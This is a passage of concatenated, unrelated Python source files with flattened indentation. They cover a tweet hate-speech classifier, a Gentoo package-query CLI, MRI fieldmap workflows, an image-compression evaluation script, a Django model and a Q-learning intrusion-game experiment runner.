These include Sentiment scores, Text and Readability scores,
as well as Twitter specific features"""
sentiment = sentiment_analyzer.polarity_scores(tweet)
words = preprocess(tweet) # Get text only
syllables = textstat.syllable_count(words)
num_chars = sum(len(w) for w in words)
num_chars_total = len(tweet)
num_terms = len(tweet.split())
num_words = len(words.split())
avg_syl = round(float((syllables + 0.001)) / float(num_words + 0.001), 4)
num_unique_terms = len(set(words.split()))
###Modified FK grade, where avg words per sentence is just num words/1
FKRA = round(float(0.39 * float(num_words) / 1.0) + float(11.8 * avg_syl) - 15.59, 1)
##Modified FRE score, where sentence fixed to 1
FRE = round(206.835 - 1.015 * (float(num_words) / 1.0) - (84.6 * float(avg_syl)), 2)
twitter_objs = count_twitter_objs(tweet)
retweet = 0
if "rt" in words:
retweet = 1
features = [FKRA, FRE, syllables, avg_syl, num_chars, num_chars_total, num_terms, num_words,
num_unique_terms, sentiment['neg'], sentiment['pos'], sentiment['neu'], sentiment['compound'],
twitter_objs[2], twitter_objs[1],
twitter_objs[0], retweet]
# features = pandas.DataFrame(features)
return features
def get_feature_array(tweets):
feats = []
for t in tweets:
feats.append(other_features(t))
return np.array(feats)
other_features_names = ["FKRA", "FRE","num_syllables", "avg_syl_per_word", "num_chars", "num_chars_total", \
"num_terms", "num_words", "num_unique_words", "vader neg","vader pos","vader neu", \
"vader compound", "num_hashtags", "num_mentions", "num_urls", "is_retweet"]
feats = get_feature_array(tweets)
feats_test = get_feature_array(tweets_test)
#Now join them all up
M = np.concatenate([tfidf,pos,feats],axis=1)
M_test = np.concatenate([tfidf_test,pos_test,feats_test],axis=1)
M.shape
M_test.shape
#Finally get a list of variable names
variables = ['']*len(vocab)
for k,v in vocab.items():
variables[v] = k
pos_variables = ['']*len(pos_vocab)
for k,v in pos_vocab.items():
pos_variables[v] = k
feature_names = variables+pos_variables+other_features_names
# Running the model
# The best model was selected using a GridSearch with 5-fold CV.
X = pd.DataFrame(M)
y = df['class'].astype(int)
X_test = pd.DataFrame(M_test)
y_test = df_test['class'].astype(int)
X_train, X_test_notused, y_train, y_test_notused = train_test_split(X, y, random_state=42, test_size=0)
pipe = Pipeline(
[('select', SelectFromModel(LogisticRegression(class_weight='balanced',
penalty="l1", C=0.01))),
('model', LogisticRegression(class_weight='balanced',penalty='l2'))])
param_grid = [{}] # Optionally add parameters here
grid_search = GridSearchCV(pipe,
param_grid,
cv=StratifiedKFold(n_splits=5,
random_state=42).split(X_train, y_train),
verbose=2)
model = grid_search.fit(X_train, y_train)
y_preds = model.predict(X_test)
y_probs = model.predict_proba(X_test)
for c,result in enumerate(y_preds):
tweet_id = df_test['tweet_id'][c]
hate_prob = y_probs[c,0]
not_hate_prob = y_probs[c, 1]
out_file.write(str(tweet_id)+','+str(result)+','+str(hate_prob)+','+str(not_hate_prob)+'\n')
# Evaluating the results
report = classification_report(y_test, y_preds)
print(report)
|
py
|
1a5eec92ae9a79e4312648e77c77d3211881c669
|
#!/usr/bin/python
# vim:fileencoding=utf-8
# (c) 2017 Michał Górny <[email protected]>
# Released under the terms of the 2-clause BSD license.
import argparse, os.path
from abc import abstractmethod
from . import PV, get_package_manager
from .exceptions import (AmbiguousPackageSetError, EmptyPackageSetError,
InvalidAtomStringError)
from .submodules import _supported_pms, get_pm
from .util import ABCObject
def _reponame(val):
"""
Check the value for correctness as repository name. In fact, it only ensures
it isn't a path so that it won't confuse pm.repositories[val].
@param val: the config option value
@type val: string
@return: whether the value is a correct repo name
@rtype: bool
"""
if os.path.isabs(val):
raise ValueError('Invalid repository name: %s' % val)
return val
def AtomFormatDict(a):
return {
'key': a.key,
'path': a.path,
'repository': a.repository,
'slot': a.slot,
'subslot': a.subslot,
'version': a.version,
'slotted_atom': a.slotted_atom,
'versioned_atom': a,
'unversioned_atom': a.unversioned_atom,
}
class PMQueryCommand(ABCObject):
""" A single gentoopmq command. """
@classmethod
    def help(cls):
"""
Return the help string for a sub-command.
@return: the help string
@rtype: string
"""
        descdoc = ' '.join(cls.__doc__.split())
descdoc = descdoc[0].lower() + descdoc[1:]
return descdoc.rstrip('.')
def __init__(self, argparser):
"""
Instantiate the subcommand, setting argument parser as necessary.
@param argparser: sub-command argument parser
@type argparser: C{argparse.ArgumentParser}
"""
argparser.set_defaults(instance = self)
self._arg = argparser
@abstractmethod
def __call__(self, pm, args):
"""
Call the sub-command, passing pm (a working PackageManager instance)
and args (the result of argument parsing). Can return exit code
for the process if relevant. If it doesn't, 0 will be used.
@param pm: package manager instance
@type pm: L{PackageManager}
@param args: command arguments
@type args: C{argparse.Namespace}
@return: Process exit code or None if irrelevant
@rtype: bool/None
"""
pass
class PMQueryCommands(object):
""" The container of all standard gentoopmq commands. """
# === generic information ===
class package_manager(PMQueryCommand):
"""
Get the name of a working, preferred PM.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('-v', '--with-version',
action='store_true', dest='version',
help='Print the version as well')
def __call__(self, pm, args):
if args.version:
print('%s %s' % (pm.name, pm.version))
else:
print(pm.name)
# === repository info ===
class repositories(PMQueryCommand):
"""
Print the list of ebuild repositories.
"""
def __call__(self, pm, args):
print(' '.join([r.name for r in pm.repositories]))
class repo_path(PMQueryCommand):
"""
Print the path to the named repository.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('repo_name', type=_reponame,
help='The repository name to look up')
def __call__(self, pm, args):
try:
r = pm.repositories[args.repo_name]
except KeyError:
self._arg.error('No repository named %s' % args.repo_name)
return 1
print(r.path)
# === package matching ===
class match(PMQueryCommand):
"""
Print packages matching the specified atom.
"""
def __init__(self, argparser):
PMQueryCommand.__init__(self, argparser)
argparser.add_argument('-b', '--best', action='store_true',
help='Print only the best version')
argparser.add_argument('-s', '--best-in-slot', action='store_true',
help='Print the best version in each available slot')
argparser.add_argument('-f', '--format', default='{versioned_atom}',
help=('Output format string (can include: '
+ '{versioned_atom}, {unversioned_atom}, {slotted_atom}, '
+ '{key}, {key.category}, {key.package}, '
+ '{version}, {version.revision}, {version.without_revision}, '
+ '{slot}, {subslot}, {repository}, {path})'))
argparser.add_argument('package_atom', nargs='+',
help='The package atom to match')
def __call__(self, pm, args):
if args.best and args.best_in_slot:
self._arg.error('--best and --best-in-slot are mutually exclusive')
for in_atom in args.package_atom:
try:
a = pm.Atom(in_atom)
except InvalidAtomStringError as e:
self._arg.error(e)
return 1
pkgs = pm.stack.filter(a)
if args.best_in_slot:
pkgs = [pg.best for pg in pkgs.group_by('slotted_atom')]
if args.best:
try:
pkgs = (pkgs.best,)
except AmbiguousPackageSetError:
self._arg.error('Multiple disjoint packages match %s' % in_atom)
return 1
except EmptyPackageSetError:
self._arg.error('No packages match %s' % in_atom)
return 1
for p in pkgs:
print(args.format.format(**AtomFormatDict(p)))
# === shell ===
class shell(PMQueryCommand):
"""
Run a Python shell with current PM selected.
"""
def __call__(self, pm, args):
import gentoopm.filters as f
import gentoopm.matchers as m
our_imports = (
('pm', pm),
('f', f),
('m', m))
welc = '''The following objects have been imported for you:\n'''
welc += '\n'.join(['\t%s: %s' % (key, repr(var))
for key, var in our_imports])
kwargs = {}
try:
from IPython import embed
except ImportError:
try:
from IPython.Shell import IPShellEmbed
except ImportError:
print('For better user experience, install IPython.')
from code import InteractiveConsole
embed = InteractiveConsole({'pm': pm}).interact
kwargs['banner'] = welc
else:
embed = IPShellEmbed()
embed.set_banner(embed.IP.BANNER + '\n\n' + welc)
else:
kwargs['banner2'] = welc
embed(**kwargs)
def __iter__(self):
for k in dir(self):
if k.startswith('_'):
continue
cls = getattr(self, k)
yield (k.replace('_', '-'), cls.help(), cls)
class PMQueryCLI(object):
""" A CLI for gentoopmq. """
def __init__(self):
self.argparser = arg = argparse.ArgumentParser()
all_pms = frozenset(_supported_pms)
arg.add_argument('-V', '--version',
action='version', version='%s %s' % (arg.prog, PV))
arg.add_argument('-p', '--package-manager',
action='store', help='Use a specific package manager',
choices=all_pms)
subp = arg.add_subparsers(title = 'Sub-commands')
for cmd_name, cmd_help, cmd_class in PMQueryCommands():
p = subp.add_parser(cmd_name, help=cmd_help)
cmd_class(p)
def main(self, argv):
arg = self.argparser
arg.prog = os.path.basename(argv[0])
args = arg.parse_args(argv[1:])
if args.package_manager is not None:
pm = get_pm(args.package_manager)
else:
try:
pm = get_package_manager()
except Exception:
arg.error('No working package manager could be found.')
return args.instance(pm, args) or 0
|
py
|
1a5eed868d8a1b7fc672cd8556318a4dda7cf8c8
|
###################
Python 2.7.12
###################
try:
hrs = float(raw_input("Enter Hours: "))
pay = float(raw_input("Enter pay: "))
overtime_pay_rate = 1.5
if hrs < 40:
print hrs * pay
else:
extra_hrs = hrs - 40 #5hours
pay_for_extra_hour = pay * overtime_pay_rate #15.75
overtime_pay = extra_hrs * pay_for_extra_hour #78.75
normal_pay = 40 * pay #420
print normal_pay + overtime_pay
except ValueError:
print("Please enter a number")
|
py
|
1a5eedd290c4a502ec42609b9585edeb43edc9b2
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Processing phase-difference (aka :abbr:`GRE (gradient-recalled echo)`) fieldmaps.
.. _gre-fieldmaps:
Workflows for processing :abbr:`GRE (gradient recalled echo)` fieldmaps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Workflows for preparing the magnitude part of :abbr:`GRE (gradient-recalled echo)` fieldmap
images and cleaning up the fieldmaps created from the phases or phasediff.
"""
from nipype.pipeline import engine as pe
from nipype.interfaces import utility as niu, fsl, ants
from niflow.nipype1.workflows.dmri.fsl.utils import cleanup_edge_pipeline
from niworkflows.engine.workflows import LiterateWorkflow as Workflow
from niworkflows.interfaces.images import IntraModalMerge
from niworkflows.interfaces.masks import BETRPT
def init_magnitude_wf(omp_nthreads, name='magnitude_wf'):
"""
Prepare the magnitude part of :abbr:`GRE (gradient-recalled echo)` fieldmaps.
Average (if not done already) the magnitude part of the
:abbr:`GRE (gradient recalled echo)` images, run N4 to
correct for B1 field nonuniformity, and skull-strip the
preprocessed magnitude.
Workflow Graph
.. workflow ::
:graph2use: orig
:simple_form: yes
from sdcflows.workflows.fmap import init_magnitude_wf
wf = init_magnitude_wf(omp_nthreads=6)
Parameters
----------
omp_nthreads : int
Maximum number of threads an individual process may use
name : str
Name of workflow (default: ``magnitude_wf``)
Inputs
------
magnitude : pathlike
Path to the corresponding magnitude path(s).
Outputs
-------
fmap_ref : pathlike
Path to the fieldmap reference calculated in this workflow.
fmap_mask : pathlike
Path to a binary brain mask corresponding to the reference above.
"""
workflow = Workflow(name=name)
inputnode = pe.Node(
niu.IdentityInterface(fields=['magnitude']), name='inputnode')
outputnode = pe.Node(
niu.IdentityInterface(fields=['fmap_ref', 'fmap_mask', 'mask_report']),
name='outputnode')
# Merge input magnitude images
magmrg = pe.Node(IntraModalMerge(), name='magmrg')
# de-gradient the fields ("bias/illumination artifact")
n4_correct = pe.Node(ants.N4BiasFieldCorrection(dimension=3, copy_header=True),
name='n4_correct', n_procs=omp_nthreads)
bet = pe.Node(BETRPT(generate_report=True, frac=0.6, mask=True),
name='bet')
workflow.connect([
(inputnode, magmrg, [('magnitude', 'in_files')]),
(magmrg, n4_correct, [('out_file', 'input_image')]),
(n4_correct, bet, [('output_image', 'in_file')]),
(bet, outputnode, [('mask_file', 'fmap_mask'),
('out_file', 'fmap_ref'),
('out_report', 'mask_report')]),
])
return workflow
def init_fmap_postproc_wf(omp_nthreads, fmap_bspline, median_kernel_size=5,
name='fmap_postproc_wf'):
"""
Postprocess a B0 map estimated elsewhere.
This workflow denoises (mostly via smoothing) a B0 fieldmap.
Workflow Graph
.. workflow ::
:graph2use: orig
:simple_form: yes
from sdcflows.workflows.fmap import init_fmap_postproc_wf
wf = init_fmap_postproc_wf(omp_nthreads=6, fmap_bspline=False)
Parameters
----------
omp_nthreads : int
Maximum number of threads an individual process may use
fmap_bspline : bool
Whether the fieldmap should be smoothed and extrapolated to off-brain regions
using B-Spline basis.
median_kernel_size : int
Size of the kernel when smoothing is done with a median filter.
name : str
Name of workflow (default: ``fmap_postproc_wf``)
Inputs
------
fmap_mask : pathlike
A brain binary mask corresponding to this fieldmap.
fmap_ref : pathlike
A preprocessed magnitude/reference image for the fieldmap.
fmap : pathlike
A B0-field nonuniformity map (aka fieldmap) estimated elsewhere.
Outputs
-------
out_fmap : pathlike
Postprocessed fieldmap.
"""
workflow = Workflow(name=name)
inputnode = pe.Node(niu.IdentityInterface(
fields=['fmap_mask', 'fmap_ref', 'fmap', 'metadata']), name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['out_fmap', 'metadata']),
name='outputnode')
if fmap_bspline:
from ..interfaces.fmap import FieldEnhance
# despike_threshold=1.0, mask_erode=1),
fmapenh = pe.Node(
FieldEnhance(unwrap=False, despike=False),
name='fmapenh', mem_gb=4, n_procs=omp_nthreads)
workflow.connect([
(inputnode, fmapenh, [('fmap_mask', 'in_mask'),
('fmap_ref', 'in_magnitude'),
(('fmap', _pop), 'in_file')]),
(fmapenh, outputnode, [('out_file', 'out_fmap')]),
])
else:
recenter = pe.Node(niu.Function(function=_recenter),
name='recenter', run_without_submitting=True)
denoise = pe.Node(fsl.SpatialFilter(
operation='median', kernel_shape='sphere',
kernel_size=median_kernel_size), name='denoise')
demean = pe.Node(niu.Function(function=_demean), name='demean')
cleanup_wf = cleanup_edge_pipeline(name="cleanup_wf")
workflow.connect([
(inputnode, cleanup_wf, [('fmap_mask', 'inputnode.in_mask')]),
(inputnode, recenter, [(('fmap', _pop), 'in_file')]),
(recenter, denoise, [('out', 'in_file')]),
(denoise, demean, [('out_file', 'in_file')]),
(demean, cleanup_wf, [('out', 'inputnode.in_file')]),
(cleanup_wf, outputnode, [('outputnode.out_file', 'out_fmap')]),
(inputnode, outputnode, [(('metadata', _pop), 'metadata')]),
])
return workflow
def _recenter(in_file):
"""Recenter the phase-map distribution to the -pi..pi range."""
from os import getcwd
import numpy as np
import nibabel as nb
from nipype.utils.filemanip import fname_presuffix
nii = nb.load(in_file)
data = nii.get_fdata(dtype='float32')
msk = data != 0
data[msk] -= np.median(data[msk])
out_file = fname_presuffix(in_file, suffix='_recentered',
newpath=getcwd())
nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_file)
return out_file
def _demean(in_file, in_mask=None, usemode=True):
"""
Subtract the median (a more robust estimate than the mean) from a map.
Parameters
----------
usemode : bool
Use the mode instead of the median (should be even more robust
against outliers).
"""
from os import getcwd
import numpy as np
import nibabel as nb
from nipype.utils.filemanip import fname_presuffix
nii = nb.load(in_file)
data = nii.get_fdata(dtype='float32')
msk = np.ones_like(data, dtype=bool)
if in_mask is not None:
msk[nb.load(in_mask).get_fdata(dtype='float32') < 1e-4] = False
if usemode:
from scipy.stats import mode
data[msk] -= mode(data[msk], axis=None)[0][0]
else:
data[msk] -= np.median(data[msk], axis=None)
out_file = fname_presuffix(in_file, suffix='_demean',
newpath=getcwd())
nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_file)
return out_file
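# Illustrative numbers (not from the codebase): for masked values [1, 1, 1, 10]
# both the mode and the median subtract 1, leaving the outlier at 9, whereas a
# plain mean would subtract 3.25 and shift the whole background.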
def _pop(inlist):
if isinstance(inlist, (tuple, list)):
return inlist[0]
return inlist
|
py
|
1a5eee429ad996a94703e1492f3a34bb2a8c15bf
|
import torch
from torchvision import transforms
import matplotlib.pyplot as plt
import os
from PIL import Image
import PIL
import glob
import numpy as np
from model_new import *
from model import *
from models.temp import Cheng2020Attention
from models.temp_and_FIF import Cheng2020Attention_FIF
from models.temp_1bpp import Cheng2020Attention_1bpp
from models.temp_016bpp import Cheng2020Attention_0_16bpp
from models.temp_highBitRate import Cheng2020Attention_highBitRate2
from models.test_freqSepNet import Cheng2020Attention_freqSep
import gzip
import pytorch_msssim
from utils.Conditional_Entropy import compute_conditional_entropy
#/home/access/dev/data_sets/kitti/flow_2015/data_scene_flow
save_img_and_recon_for_GPNN = False
device = 'cuda' if torch.cuda.is_available() else 'cpu'
#model = Cheng2020Attention_1bpp()
#model = Cheng2020Attention_0_16bpp()
model1 = Cheng2020Attention_highBitRate2()
#model2 = Cheng2020Attention_highBitRate2()
#model = Cheng2020Attention_highBitRate2()
pretrained_model_path1 = '/home/access/dev/iclr_17_compression/checkpoints_new/new_net/Sharons dataset/ABLATION/0.0625bpp/model_best_weights (1).pth'
#pretrained_model_path2 = ''
checkpoint = torch.load(pretrained_model_path1)
model1.load_state_dict(checkpoint['model_state_dict'])
#checkpoint = torch.load(pretrained_model_path2)
#model2.load_state_dict(checkpoint['model_state_dict'])
model1 = model1.to(device)
model1.eval()
#model2 = model2.to(device)
#model2.eval()
stereo1_dir = '/media/access/SDB500GB/dev/data_sets/kitti/Sharons datasets/data_scene_flow_multiview/testing/image_2'#'/home/access/dev/data_sets/kitti/Sharons datasets/data_scene_flow_multiview/testing/image_2'
#stereo2_dir = '/media/access/SDB500GB/dev/data_sets/kitti/Sharons datasets/data_stereo_flow_multiview/testing/image_2'#'/home/access/dev/data_sets/kitti/Sharons datasets/data_stereo_flow_multiview/testing/image_2'
# smaller dataset:
#stereo1_dir = '/media/access/SDB500GB/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_8/image_2'
#stereo2_dir = '/home/access/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_8/image_03'
#stereo2_dir = '/home/access/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_32/image_3_OF_to_2'
# CLIC view test:
#stereo1_dir = '/home/access/dev/data_sets/CLIC2021/professional_train_2020/im3'
#stereo2_dir = '/home/access/dev/data_sets/CLIC2021/professional_train_2020/im2'
#list1 = glob.glob(os.path.join(stereo1_dir, '*11.png'))
#list2 = glob.glob(os.path.join(stereo2_dir, '*11.png'))
#stereo1_path_list = list1 + list2
stereo1_path_list = glob.glob(os.path.join(stereo1_dir, '*.png'))
#stereo1_path_list = glob.glob(os.path.join('/home/access/dev/Holopix50k/test/left', '*.jpg'))
#transform = transforms.Compose([transforms.Resize((192, 608), interpolation=PIL.Image.BICUBIC), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((320, 320)), transforms.ToTensor()])
transform = transforms.Compose([transforms.CenterCrop((320, 1224)), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((360, 360)), transforms.ToTensor()])
#transform = transforms.Compose([transforms.Resize((320, 960), interpolation=Image.BICUBIC), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((370, 740)),transforms.Resize((128, 256), interpolation=3), transforms.ToTensor()])
#transform = transforms.Compose([transforms.ToTensor()])
for i in range(len(stereo1_path_list)):
img_stereo1 = Image.open(stereo1_path_list[i])
#img_stereo2_name = stereo1_path_list[i].replace('left', 'right')
img_stereo2_name = stereo1_path_list[i].replace('image_2', 'image_3')
img_stereo2 = Image.open(img_stereo2_name)
input1 = transform(img_stereo1)
input2 = transform(img_stereo2)
# cut image H*W to be a multiple of M (32)
M = 32
shape = input1.size()
input1 = input1[:, :M * (shape[1] // M), :M * (shape[2] // M)]
input2 = input2[:, :M * (shape[1] // M), :M * (shape[2] // M)]
##
input1 = input1[None, ...].to(device)
input2 = input2[None, ...].to(device)
# Decoded images of two models, use average to reduce noise
_, _, final_im1_recon1, z1_down = model1(input1, input2)
#_, _, final_im1_recon2, _ = model2(input1, input2)
numpy_input_image = torch.squeeze(input1).permute(1, 2, 0).cpu().detach().numpy()
numpy_output_image1 = torch.squeeze(final_im1_recon1).permute(1, 2, 0).cpu().detach().numpy()
#numpy_output_image2 = torch.squeeze(final_im1_recon2).permute(1, 2, 0).cpu().detach().numpy()
'''
diff1 = numpy_input_image - numpy_output_image1
diff1 = (diff1 - diff1.min())/(diff1.max() - diff1.min())
#diff2 = 128 + (original - numpy_output_image2)
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
#fig.suptitle('Original, Diff - 0.03_bpp, 0.06_bpp')
fig.suptitle('Original, Recon, Diff (0.06_bpp Ablation)')
ax1.imshow(numpy_input_image)
ax2.imshow(numpy_output_image1)
ax3.imshow(diff1)
fig.tight_layout()
plt.show()
'''
if True:
_, _, final_im1_recon2, z1_down = model1(input2, input2)
numpy_output_SI = torch.squeeze(final_im1_recon2).permute(1, 2, 0).cpu().detach().numpy()
orig_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/original/'
orig_si_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/SI/'
rec_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/recon-original/'
rec_SI_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/recon-SI/'
orig_si_numpy = torch.squeeze(input2).permute(1, 2, 0).cpu().detach().numpy()
orig_si_image = Image.fromarray((orig_si_numpy*255).astype(np.uint8))
orig_image = Image.fromarray((numpy_input_image*255).astype(np.uint8))
rec_SI_img = Image.fromarray((numpy_output_SI*255).astype(np.uint8))
rec_img = Image.fromarray((numpy_output_image1*255).astype(np.uint8))
orig_si_image.save(orig_si_path+stereo1_path_list[i][-13:])
orig_image.save(orig_path+stereo1_path_list[i][-13:])
rec_SI_img.save(rec_SI_path+stereo1_path_list[i][-13:])
rec_img.save(rec_path + stereo1_path_list[i][-13:])
|
py
|
1a5eee5b3da99a9b1f84ec0399daa7826633962d
|
from django.db import models as djangorm
import django.db.utils
from util import staticproperty
# declare identifiers for MovementType constants
INFANTRY = None
CAVALRY = None
ARMORED = None
FLIER = None
class MovementType(djangorm.Model):
#{
id = djangorm.CharField(max_length=4, primary_key=True)
name = djangorm.CharField(max_length=10)
def __str__(self):
return self.name
def __repr__(self):
return 'MovementType {name: "%s"}' % self.name
@staticproperty
def INFANTRY():
return INFANTRY
@staticproperty
def CAVALRY():
return CAVALRY
@staticproperty
def ARMORED():
return ARMORED
@staticproperty
def FLIER():
return FLIER
#}
# give constants their values now that MovementType is defined
try:
INFANTRY = MovementType.objects.filter(pk='1Inf').first()
CAVALRY = MovementType.objects.filter(pk='2Cav').first()
ARMORED = MovementType.objects.filter(pk='3Arm').first()
FLIER = MovementType.objects.filter(pk='4Fly').first()
except django.db.utils.OperationalError:
pass
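# Usage sketch: once the table exists (after migrations), MovementType.INFANTRY,
# MovementType.CAVALRY, etc. resolve to the rows with pks '1Inf', '2Cav', '3Arm'
# and '4Fly'; before that they stay None because the OperationalError above is ignored.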
|
py
|
1a5eef616dc9952a86c0e52af7218a2b658a01af
|
import os
import time
import sys
import glob
from gym_idsgame.config.runner_mode import RunnerMode
from gym_idsgame.agents.training_agents.q_learning.q_agent_config import QAgentConfig
from gym_idsgame.agents.dao.agent_type import AgentType
from gym_idsgame.config.client_config import ClientConfig
from gym_idsgame.runnner import Runner
from experiments.util import plotting_util, util
def get_script_path():
"""
:return: the script path
"""
return os.path.dirname(os.path.realpath(sys.argv[0]))
def default_output_dir() -> str:
"""
:return: the default output dir
"""
script_dir = get_script_path()
return script_dir
def default_config_path() -> str:
"""
:return: the default path to configuration file
"""
config_path = os.path.join(default_output_dir(), './config.json')
return config_path
def default_config() -> ClientConfig:
"""
:return: Default configuration for the experiment
"""
q_agent_config = QAgentConfig(gamma=0.999, alpha=0.0005, epsilon=1, render=False, eval_sleep=0.9,
min_epsilon=0.01, eval_episodes=100, train_log_frequency=100,
epsilon_decay=0.9999, video=True, eval_log_frequency=1,
video_fps=5, video_dir=default_output_dir() + "/results/videos", num_episodes=20001,
eval_render=False, gifs=True, gif_dir=default_output_dir() + "/results/gifs",
eval_frequency=1000, attacker=True, defender=False, video_frequency=101,
save_dir=default_output_dir() + "/results/data")
env_name = "idsgame-random_defense-v3"
client_config = ClientConfig(env_name=env_name, attacker_type=AgentType.TABULAR_Q_AGENT.value,
mode=RunnerMode.TRAIN_ATTACKER.value,
q_agent_config=q_agent_config, output_dir=default_output_dir(),
title="TrainingQAgent vs RandomDefender",
random_seeds=[0, 999, 299, 399, 499], run_many=True
)
return client_config
def write_default_config(path:str = None) -> None:
"""
Writes the default configuration to a json file
:param path: the path to write the configuration to
:return: None
"""
if path is None:
path = default_config_path()
config = default_config()
util.write_config_file(config, path)
def plot_csv(config: ClientConfig, eval_csv_path:str, train_csv_path: str, attack_stats_csv_path : str = None,
random_seed : int = 0) -> None:
"""
Plot results from csv files
:param config: client config
:param eval_csv_path: path to the csv file with evaluation results
:param train_csv_path: path to the csv file with training results
:param random_seed: the random seed of the experiment
:param attack_stats_csv_path: path to attack stats
:return: None
"""
plotting_util.read_and_plot_results(train_csv_path, eval_csv_path,
config.q_agent_config.train_log_frequency,
config.q_agent_config.eval_frequency, config.q_agent_config.eval_log_frequency,
config.q_agent_config.eval_episodes, config.output_dir, sim=False,
random_seed = random_seed, attack_stats_csv_path = attack_stats_csv_path)
def plot_average_results(experiment_title :str, config: ClientConfig, eval_csv_paths:list,
train_csv_paths: str) -> None:
"""
Plots average results after training with different seeds
:param experiment_title: title of the experiment
:param config: experiment config
:param eval_csv_paths: paths to csv files with evaluation data
:param train_csv_paths: path to csv files with training data
:return: None
"""
plotting_util.read_and_plot_average_results(experiment_title, train_csv_paths, eval_csv_paths,
config.q_agent_config.train_log_frequency,
config.q_agent_config.eval_frequency,
config.output_dir)
def run_experiment(configpath: str, random_seed: int, noconfig: bool):
"""
Runs one experiment and saves results and plots
:param configpath: path to experiment config file
:param random_seed: the random seed of the experiment
:param noconfig: whether to override config
:return: (train_csv_path, eval_csv_path)
"""
if configpath is not None and not noconfig:
if not os.path.exists(configpath):
write_default_config()
config = util.read_config(configpath)
else:
config = default_config()
time_str = str(time.time())
util.create_artefact_dirs(config.output_dir, random_seed)
logger = util.setup_logger("tabular_q_learning_vs_random_defense-v3", config.output_dir + "/results/logs/" +
str(random_seed) + "/",
time_str=time_str)
config.q_agent_config.save_dir = default_output_dir() + "/results/data/" + str(random_seed) + "/"
config.q_agent_config.video_dir= default_output_dir() + "/results/videos/" + str(random_seed) + "/"
config.q_agent_config.gif_dir= default_output_dir() + "/results/gifs/" + str(random_seed) + "/"
config.logger = logger
config.q_agent_config.logger = logger
config.q_agent_config.random_seed = random_seed
config.random_seed = random_seed
config.q_agent_config.to_csv(config.output_dir + "/results/hyperparameters/" + str(random_seed) + "/" + time_str + ".csv")
train_result, eval_result = Runner.run(config)
train_csv_path = ""
eval_csv_path = ""
if len(train_result.avg_episode_steps) > 0 and len(eval_result.avg_episode_steps) > 0:
train_csv_path = config.output_dir + "/results/data/" + str(random_seed) + "/" + time_str + "_train" + ".csv"
train_result.to_csv(train_csv_path)
eval_csv_path = config.output_dir + "/results/data/" + str(random_seed) + "/" + time_str + "_eval" + ".csv"
eval_result.to_csv(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, random_seed=random_seed)
return train_csv_path, eval_csv_path
# Program entrypoint
if __name__ == '__main__':
args = util.parse_args(default_config_path())
experiment_title = "Q-learning vs random defense"
if args.configpath is not None and not args.noconfig:
if not os.path.exists(args.configpath):
write_default_config()
config = util.read_config(args.configpath)
else:
config = default_config()
if args.plotonly:
base_dir = default_output_dir() + "/results/data/"
train_csv_paths = []
eval_csv_paths = []
if config.run_many:
for seed in config.random_seeds:
train_csv_path = glob.glob(base_dir + str(seed) + "/*_train.csv")[0]
eval_csv_path = glob.glob(base_dir + str(seed) + "/*_eval.csv")[0]
attack_stats_csv_path = None
try:
attack_stats_csv_paths = glob.glob(base_dir + str(seed) + "/attack_stats_*.csv")
attack_stats_csv_path = list(filter(lambda x: "checkpoint" not in x, attack_stats_csv_paths))[0]
except:
pass
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, attack_stats_csv_path, random_seed=seed)
try:
plot_average_results(experiment_title, config, eval_csv_paths, train_csv_paths)
except Exception as e:
print("Error when trying to plot summary: " + str(e))
else:
train_csv_path = glob.glob(base_dir + str(config.random_seed) + "/*_train.csv")[0]
eval_csv_path = glob.glob(base_dir + str(config.random_seed) + "/*_eval.csv")[0]
attack_stats_csv_path = None
try:
attack_stats_csv_paths = glob.glob(base_dir + str(config.random_seed) + "/attack_stats_*.csv")
attack_stats_csv_path = \
list(filter(lambda x: "checkpoint" not in attack_stats_csv_paths, attack_stats_csv_paths))[0]
except:
pass
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, attack_stats_csv_path=attack_stats_csv_path,
random_seed=config.random_seed)
else:
if not config.run_many:
run_experiment(args.configpath, 0, args.noconfig)
else:
train_csv_paths = []
eval_csv_paths = []
for seed in config.random_seeds:
train_csv_path, eval_csv_path = run_experiment(args.configpath, seed, args.noconfig)
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
try:
plot_average_results(experiment_title, config, eval_csv_paths, train_csv_paths)
except Exception as e:
print("Error when trying to plot summary: " + str(e))
|
py
|
1a5ef20d6ba1c710d9075925991baa04444df9eb
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
class ScalableQueues(object):
_queues = {}
@classmethod
def queues(cls):
return cls._queues
@classmethod
def add(cls, name, routing_key="", queue_arguments=None):
queue_arguments = queue_arguments or {}
